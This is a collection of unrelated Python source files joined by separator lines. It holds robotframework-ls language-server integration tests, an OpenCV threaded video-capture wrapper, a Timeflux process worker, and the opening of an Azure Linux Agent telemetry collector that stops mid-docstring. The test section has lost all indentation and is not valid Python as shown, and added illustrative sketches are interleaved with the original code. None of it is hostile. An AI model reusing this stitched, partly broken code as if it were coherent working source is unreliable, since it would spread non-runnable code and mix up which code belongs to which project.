# Don't check the signature documentation in the data regression so that the
# test doesn't become brittle.
docs = signatures[0].pop("documentation")
assert docs["kind"] == MarkupKind.Markdown
assert "Log" in docs["value"]
data_regression.check(result)
def test_hover_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
from robocorp_ls_core.lsp import HoverTypedDict
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log """
doc = Document("", txt)
language_server.open_doc(uri, 1, txt)
line, col = doc.get_last_line_col()
ret = language_server.request_hover(uri, line, col)
result: HoverTypedDict = ret["result"]
contents = result["contents"]
assert "Log" in contents["value"]
assert contents["kind"] == "markdown"
def test_document_highlight_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
from robocorp_ls_core.lsp import DocumentHighlightResponseTypedDict
from robocorp_ls_core.lsp import DocumentHighlightTypedDict
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log Something
log Else
"""
doc = Document("", txt)
language_server.open_doc(uri, 1, txt)
line, col = doc.get_last_line_col()
line -= 1
ret: DocumentHighlightResponseTypedDict = (
language_server.request_text_document_highlight(uri, line, col)
)
result: DocumentHighlightTypedDict = ret["result"]
assert len(result) == 2
data_regression.check(result)
def test_workspace_symbols_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
ret = language_server.request_workspace_symbols()
result = ret["result"]
assert len(result) > 0
def test_folding_range_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_folding_range(uri)
result = ret["result"]
data_regression.check(result)
def test_code_lens_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core import uris
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
txt = """
*** Test Case ***
Log It
Log
*** Task ***
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_code_lens(uri)
found = ret["result"]
check_code_lens_data_regression(data_regression, found)
def test_code_lens_integrated_suites(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core import uris
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
txt = """
*** Task ***
Log It
Log
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_code_lens(uri)
found = ret["result"]
check_code_lens_data_regression(data_regression, found)
def test_list_tests_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Case ***
Log It
Log
*** Task ***
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.execute_command("robot.listTests", [{"uri": uri}])
found = ret["result"]
data_regression.check(found)
def test_document_symbol_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Task ***
Log It
Log
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_document_symbol(uri)
found = ret["result"]
data_regression.check(found)
def test_shadowing_libraries(language_server_io: ILanguageServerClient, workspace_dir):
from robocorp_ls_core import uris
from pathlib import Path
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
language_server = language_server_io
os.makedirs(workspace_dir, exist_ok=True)
builtin_lib = Path(workspace_dir) / "builtin.py"
case1_lib = Path(workspace_dir) / "case1.robot"
case2_lib = Path(workspace_dir) / "case2.robot"
builtin_lib.write_text(
"""
def something():
pass
"""
)
case1_lib.write_text(
"""
*** Settings ***
Library builtin
*** Test Cases ***
User can call builtin
Something
"""
)
case2_lib.write_text(
"""
*** Test Cases ***
User can call builtin 2
Log Task executed
"""
)
language_server.initialize(workspace_dir, process_id=os.getpid())
uri1 = uris.from_fs_path(str(case1_lib))
uri2 = uris.from_fs_path(str(case2_lib))
for _i in range(2):
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri1, 1, text=None)
assert message_matcher.event.wait(TIMEOUT)
assert message_matcher.msg["params"]["uri"] == uri1
assert message_matcher.msg["params"]["diagnostics"] == []
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri2, 1, text=None)
assert message_matcher.event.wait(TIMEOUT)
assert message_matcher.msg["params"]["uri"] == uri2
assert message_matcher.msg["params"]["diagnostics"] == []
language_server.close_doc(uri2)
language_server.close_doc(uri1)
class _RfInterpreterInfo:
def __init__(self, interpreter_id: int, uri: str):
self.interpreter_id = interpreter_id
self.uri = uri
@pytest.fixture
def rf_interpreter_startup(language_server_io: ILanguageServerClient, ws_root_path):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_START
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_STOP
from robocorp_ls_core import uris
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
ret1 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_START, [{"uri": uri}]
)
assert ret1["result"] == {
"success": True,
"message": None,
"result": {"interpreter_id": 0},
}
yield _RfInterpreterInfo(interpreter_id=0, uri=uri)
# Note: success could be False if it was stopped in the test...
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 0}]
)
def test_rf_interactive_integrated_basic(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_START
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_STOP
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_SEMANTIC_TOKENS
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
language_server = language_server_io
uri = rf_interpreter_startup.uri
ret2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_START, [{"uri": uri}]
)
assert ret2["result"] == {
"success": True,
"message": None,
"result": {"interpreter_id": 1},
}
stop1 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 0}]
)
assert stop1["result"] == {"success": True, "message": None, "result": None}
stop_inexistant = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 22}]
)
assert stop_inexistant["result"] == {
"success": False,
"message": "Did not find interpreter with id: 22",
"result": None,
}
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
eval2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": 1,
"code": """
*** Task ***
Some task
Log Something console=True
""",
}
],
)
assert eval2["result"] == {"success": True, "message": None, "result": None}
assert message_matcher.event.wait(10)
assert message_matcher.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {"output": "Something\n", "category": "stdout", "interpreter_id": 1},
}
semantic_tokens = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_SEMANTIC_TOKENS,
[{"interpreter_id": 1, "code": "Log Something console=True"}],
)
data = semantic_tokens["result"]["data"]
assert data == [
0,
0,
3,
7,
0,
0,
7,
9,
12,
0,
0,
14,
7,
11,
0,
0,
7,
1,
6,
0,
0,
1,
4,
12,
0,
]
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[{"interpreter_id": 1, "code": "Lo", "position": Position(0, 2).to_dict()}],
)
for completion in completions["result"]["suggestions"]:
if completion["label"] == "Log (BuiltIn)":
break
else:
raise AssertionError('Did not find "Log" in the suggestions.')
stop2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 1}]
)
assert stop2["result"] == {"success": True, "message": None, "result": None}
def test_rf_interactive_integrated_input_request(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
from robocorp_ls_core import uris
language_server = language_server_io
uri = rf_interpreter_startup.uri
robot_file = uris.to_fs_path(uri)
lib_file = os.path.join(os.path.dirname(robot_file), "my_lib.py")
with open(lib_file, "w", encoding="utf-8") as stream:
stream.write(
r"""
def check_input():
import sys
sys.__stdout__.write('Enter something\n')
return input()
"""
)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[{"interpreter_id": 0, "code": "*** Settings ***\nLibrary ./my_lib.py"}],
)
def run_in_thread():
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": 0,
"code": """
*** Test Case ***
Test
${var}= Check Input
Log ${var} console=True
""",
}
],
)
t = threading.Thread(target=run_in_thread)
t.start()
assert message_matcher.event.wait(10)
assert message_matcher.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {
"output": "Enter something\n",
"category": "stdout",
"interpreter_id": 0,
},
}
import time
time.sleep(0.5)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[{"interpreter_id": 0, "code": "EnterThis"}],
)
assert message_matcher.event.wait(10)
assert message_matcher.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {"output": "EnterThis\n", "category": "stdout", "interpreter_id": 0},
}
t.join(10)
assert not t.is_alive()
def test_rf_interactive_integrated_hook_robocorp_update_env(
language_server_io: ILanguageServerClient, cases: CasesFixture, workspace_dir: str
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
from robocorp_ls_core import uris
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_START
language_server = language_server_io
cases.copy_to("custom_env", workspace_dir)
p = Path(workspace_dir)
plugins_path = p / "plugins"
assert plugins_path.exists()
language_server.initialize(
workspace_dir,
process_id=os.getpid(),
initialization_options={"pluginsDir": str(plugins_path)},
)
p = Path(workspace_dir) / "env1" / "caselib1.robot"
assert p.exists()
uri = uris.from_fs_path(str(p))
handled_update_launch_env = threading.Event()
def handle_execute_workspace_command(method, message_id, params):
assert method == "$/executeWorkspaceCommand"
assert isinstance(params, dict)
command = params["command"]
assert command == "robocorp.updateLaunchEnv"
arguments = params["arguments"]
assert arguments["targetRobot"]
env = arguments["env"]
env["CUSTOM_VAR_SET_FROM_TEST"] = "EXPECTED VALUE"
contents = {"jsonrpc": "2.0", "id": message_id, "result": env}
language_server.write(contents)
handled_update_launch_env.set()
return True
language_server.register_request_handler(
"$/executeWorkspaceCommand", handle_execute_workspace_command
)
ret1 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_START, [{"uri": uri}]
)
assert handled_update_launch_env.wait(5)
try:
assert ret1["result"] == {
"success": True,
"message": None,
"result": {"interpreter_id": 0},
}
message_matcher_interpreter_output = (
language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
)
def run_in_thread():
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": 0,
"code": """
*** Test Case ***
Test
Log to console %{CUSTOM_VAR_SET_FROM_TEST}
""",
}
],
)
t = threading.Thread(target=run_in_thread)
t.start()
assert message_matcher_interpreter_output.event.wait(10)
assert message_matcher_interpreter_output.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {
"output": "EXPECTED VALUE\n",
"category": "stdout",
"interpreter_id": 0,
},
}
finally:
# Note: success could be False if it was stopped in the test...
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 0}]
)
def test_rf_interactive_integrated_completions(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
language_server = language_server_io
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": "\n\nLo",
"position": Position(2, 2).to_dict(),
}
],
)
for completion in completions["result"]["suggestions"]:
if completion["label"] == "Log (BuiltIn)":
assert completion.pop("documentation").startswith("**Log(")
assert completion == {
"label": "Log (BuiltIn)",
"kind": 0,
"insertText": "Log ${1:message}",
"insertTextRules": 4,
"range": {
"start": {"line": 5, "character": 4},
"end": {"line": 5, "character": 6},
"startLineNumber": 3,
"startColumn": 1,
"endLineNumber": 3,
"endColumn": 3,
},
"preselect": False,
}
break
else:
raise AssertionError('Did not find "Log" in the suggestions.')
def test_rf_interactive_integrated_completions_not_duplicated(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
language_server = language_server_io
eval2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": """
*** Keyword ***
Mykeywordentered
Log Something console=True
*** Keyword ***
Mykeywordentered
Log Something console=True
""",
}
],
)
assert eval2["result"] == {"success": True, "message": None, "result": None}
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": "\n\nMykeyworde",
"position": Position(2, 2).to_dict(),
}
],
)
assert len(completions["result"]["suggestions"]) == 1
def test_rf_interactive_integrated_fs_completions(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
data_regression,
):
from robocorp_ls_core import uris
from robocorp_ls_core.workspace import Document
# Check that we're able to get completions based on the current dir.
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
uri = rf_interpreter_startup.uri
fs_path = uris.to_fs_path(uri)
dirname = os.path.dirname(fs_path)
with open(os.path.join(dirname, "my_lib_03.py"), "w") as stream:
stream.write(
"""
def some_method():
pass
"""
)
language_server = language_server_io
code = "*** Settings ***\nLibrary ./my_"
doc = Document(uri, code)
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": code,
"position": Position(*doc.get_last_line_col()).to_dict(),
}
],
)
suggestions = completions["result"]["suggestions"]
assert suggestions
data_regression.check(suggestions)
def test_rf_interactive_integrated_auto_import_completions(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
data_regression,
):
from robocorp_ls_core.workspace import Document
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
# Check that we're able to get completions based on the current dir.
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
uri = rf_interpreter_startup.uri
language_server = language_server_io
code = "append to lis"
doc = Document(uri, code)
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": code,
"position": Position(*doc.get_last_line_col()).to_dict(),
}
],
)
suggestions = completions["result"]["suggestions"]
assert suggestions
assert "Adds values to the end of list" in suggestions[0]["documentation"]
suggestions[0]["documentation"] = "<replaced_for_test>"
check_code_lens_data_regression(data_regression, suggestions)
def test_code_lens_integrated_rf_interactive(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core import uris
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri_untitled = "~untitled"
txt = """
*** Task ***
Log It
Log
"""
language_server.open_doc(uri_untitled, 1, txt)
ret = language_server.request_code_lens(uri_untitled)
found = ret["result"]
assert not found # when unable to resolve path, we can't create it.
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
txt = """
*** Task ***
Log It
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_code_lens(uri)
found = ret["result"]
for code_lens in found:
if code_lens.get("data", {}).get("type") == "rf_interactive":
break
else:
raise AssertionError(f"Unable to find 'rf_interactive' code lens in: {ret}")
check_code_lens_data_regression(
data_regression, [code_lens], basename="code_lens_before_resolve"
)
ret = language_server.request_resolve_code_lens(code_lens)
resolved_code_lens = ret["result"]
check_code_lens_data_regression(
data_regression, [resolved_code_lens], basename="code_lens_after_resolve"
)
def test_get_rfls_home_dir(language_server_io: ILanguageServerClient):
assert language_server_io.execute_command("robot.getRFLSHomeDir", [])[
"result"
].endswith(".robotframework-ls")
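
# --- Illustrative sketch (not part of the original test module) ---
# The tests above repeatedly follow the same pattern: drive the language server
# through the test client, strip the volatile JSON-RPC "id" from the response,
# and compare the remainder against a stored file via the data_regression
# fixture provided by the pytest-regressions plugin. A minimal, self-contained
# version of that pattern (with a made-up payload) looks like this:
def test_data_regression_pattern(data_regression):
    response = {"id": 17, "result": [{"label": "Log"}, {"label": "Log Many"}]}
    del response["id"]  # the request id changes between runs, so it is not compared
    data_regression.check(response, basename="data_regression_pattern")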
|
good_videocapture.py
|
import time
import threading
import cv2
class GoodVideoCapture(cv2.VideoCapture):
    """cv2.VideoCapture wrapper that reads frames on a background thread so
    that read_latest_frame() always returns the most recent frame instead of
    a stale one from the capture's internal buffer."""

    def __init__(self, url, timeout=3, *args, **kwargs):
        super(GoodVideoCapture, self).__init__(url, *args, **kwargs)
        self.frame_receiver = None
        self.timeout = timeout
        self._result = (None, None)
        self._reading = False

    @staticmethod
    def create(url):
        # Build the capture together with its (not yet started) receiver thread.
        rtscap = GoodVideoCapture(url)
        rtscap.frame_receiver = threading.Thread(target=rtscap.recv_frame)
        rtscap.frame_receiver.daemon = True
        return rtscap

    def is_started(self):
        ok = self.isOpened()
        if ok and self._reading:
            ok = self.frame_receiver.is_alive()
        return ok

    def get_status(self):
        return self._reading

    def recv_frame(self):
        # Continuously overwrite self._result with the newest frame until
        # reading is stopped or the capture is closed.
        while self.isOpened():
            if not self._reading:
                return
            self._result = self.read()
        self._reading = False

    def read_latest_frame(self):
        # Busy-wait until a frame is available or the timeout expires.
        start_time = time.time()
        while not self._result[0] \
                and (time.time() - start_time) <= self.timeout:
            pass
        return self._result

    def start_read(self):
        self._reading = True
        self.frame_receiver.start()

    def stop_read(self):
        self._reading = False
        if self.frame_receiver.is_alive():
            self.frame_receiver.join()
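
# --- Illustrative usage sketch (not part of the original good_videocapture.py) ---
# A minimal example under the assumption that "rtsp://example.com/stream" is a
# reachable video source; any URL or device index accepted by cv2.VideoCapture
# would work the same way.
if __name__ == "__main__":
    cap = GoodVideoCapture.create("rtsp://example.com/stream")
    cap.start_read()
    try:
        ok, frame = cap.read_latest_frame()  # blocks for at most `timeout` seconds
        if ok:
            print("latest frame shape:", frame.shape)
        else:
            print("no frame received before the timeout")
    finally:
        cap.stop_read()
        cap.release()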
|
worker.py
|
"""timeflux.core.worker: spawn processes."""
import importlib
import logging
import signal
from multiprocessing import Process
from timeflux.core.logging import get_queue, init_worker
from timeflux.core.graph import Graph
from timeflux.core.scheduler import Scheduler
from timeflux.core.registry import Registry
from timeflux.core.exceptions import *
class Worker:
"""Spawn a process and launch a scheduler."""
def __init__(self, graph):
self._graph = graph
def run(self):
"""Run the process"""
p = Process(target=self._run, args=(get_queue(),), name=self._graph['id'])
p.start()
return p
def load(self):
# Build the graph and compute the traversal path
g = Graph(self._graph)
graph = g.build()
path = g.traverse()
# Set rate
Registry.rate = self._graph['rate']
# Load nodes
nodes = {}
for step in path:
node = self._load_node(graph.nodes[step['node']], step['node'])
nodes[step['node']] = node
return path, nodes
def _run(self, log_queue=None):
# Initialize logging
if log_queue:
init_worker(log_queue)
logger = logging.getLogger(__name__)
scheduler = None
try:
# Initialize the graph and instantiate the nodes
path, nodes = self.load()
# Launch scheduler and run it
scheduler = Scheduler(path, nodes, self._graph['rate'])
scheduler.run()
except KeyboardInterrupt:
# Ignore further interrupts
signal.signal(signal.SIGINT, signal.SIG_IGN)
logger.debug('Interrupting')
except (GraphDuplicateNode, GraphUndefinedNode, WorkerLoadError, ValidationError) as error:
logger.error(error)
except WorkerInterrupt as error:
logger.debug(error)
except Exception as error:
logger.exception(error)
if scheduler is not None:
logger.info('Terminating')
scheduler.terminate()
def _load_node(self, node, nid):
"""Import a module and instantiate class."""
# Import module
try:
m = importlib.import_module(node['module'])
except ModuleNotFoundError as error:
if node['module'] in error.msg:
# Missing or invalid node
raise WorkerLoadError(f"Node '{nid}': no module named '{node['module']}'")
else:
# Missing or invalid dependency
raise error
# Get class
try:
c = getattr(m, node['class'])
except AttributeError:
raise WorkerLoadError(f"Node '{nid}': no class named '{node['class']}' in module '{node['module']}'")
# Instantiate class
try:
n = c(**node['params'])
except TypeError as error:
raise WorkerLoadError(f"Node '{nid}': {error}")
return n
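
# --- Illustrative sketch (not part of the original worker.py) ---
# A stripped-down, standalone version of the dynamic-loading pattern used by
# Worker._load_node above: import a module by name, look up a class by name,
# and instantiate it with keyword parameters. The module/class/params below
# ("datetime", "timedelta", {"seconds": 5}) are arbitrary stand-ins that ship
# with Python; real node descriptors come from the Timeflux graph definition.
import importlib

def load_instance(module_name, class_name, params):
    module = importlib.import_module(module_name)  # ModuleNotFoundError if the module is missing
    cls = getattr(module, class_name)              # AttributeError if the class is missing
    return cls(**params)                           # TypeError if the params don't match the constructor

if __name__ == "__main__":
    print(load_instance("datetime", "timedelta", {"seconds": 5}))  # prints "0:00:05"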
|
collect_telemetry_events.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.agent_supported_feature import get_supported_feature_by_name, SupportedFeatureNames
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger, \
CollectOrReportEventDebugInfo, EVENT_FILE_REGEX, parse_event
from azurelinuxagent.common.exception import InvalidExtensionEventError, ServiceStoppedError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema, GuestAgentExtensionEventsSchema
from azurelinuxagent.common.utils import textutil
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_telemetry_events_handler(send_telemetry_events_handler):
return CollectTelemetryEventsHandler(send_telemetry_events_handler)
class ExtensionEventSchema(object):
"""
Class for defining the schema for Extension Events.
Sample Extension Event Example:
{
"Version":"1.0.0.23",
"Timestamp":"2018-01-02T22:08:12.510696Z" //(time in UTC (ISO-8601 standard),
"TaskName":"TestRun" //Open for publishers,
"EventLevel":"Critical/Error/Warning/Verbose/Informational/LogAlways",
"Message": "Successful test" //(max 3K, 3072 characters),
"EventPid":"1",
"EventTid":"2",
"OperationId":"Guid (str)"
}
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
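
# --- Illustrative sketch (not part of the original agent source) ---
# Shows how the schema above is typically consumed further down in this file:
# the attribute names of ExtensionEventSchema are lower-cased to build the
# required-field list, and an incoming event (modelled on the sample in the
# docstring; the values below are made up) is normalized to lower-case keys
# before validation.
def _example_normalize_extension_event():
    required_fields = [attr.lower() for attr in dir(ExtensionEventSchema)
                       if not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
    sample_event = {
        "Version": "1.0.0.23",
        "Timestamp": "2018-01-02T22:08:12.510696Z",
        "TaskName": "TestRun",
        "EventLevel": "Informational",
        "Message": "Successful test",
        "EventPid": "1",
        "EventTid": "2",
        "OperationId": "00000000-0000-0000-0000-000000000000",
    }
    normalized = {k.lower(): v.strip() for k, v in sample_event.items()
                  if k.lower() in required_fields}
    missing = [field for field in required_fields if field not in normalized]
    return normalized, missing  # missing is expected to be empty for this sample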
class _ProcessExtensionEvents(PeriodicOperation):
"""
Periodic operation for collecting extension telemetry events and enqueueing them for the SendTelemetryHandler thread.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(seconds=conf.get_etp_collection_period())
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, send_telemetry_events_handler):
super(_ProcessExtensionEvents, self).__init__(_ProcessExtensionEvents._EXTENSION_EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping current iteration".format(
self._send_telemetry_events_handler.get_thread_name()))
return
delete_all_event_files = True
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if not extension_handler_with_event_dirs:
logger.verbose("No Extension events directory exist")
return
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path)
except ServiceStoppedError:
# Since the service stopped, we should not delete the extension files; we'll retry sending them whenever
# the telemetry service comes back up
delete_all_event_files = False
except Exception as error:
msg = "Unknown error occurred when trying to collect extension events:{0}".format(
textutil.format_exception(error))
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directories are deleted each run except when the Telemetry Service is stopped,
# even if we run into an error and don't process them this run.
if delete_all_event_files:
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if it's an Extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if EVENTS_DIRECTORY directory exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _event_file_size_allowed(self, event_file_path):
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
convert_to_mb = lambda x: (1.0 * x) / (1000 * 1000)
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
return False
return True
def _capture_extension_events(self, handler_name, handler_event_dir_path):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
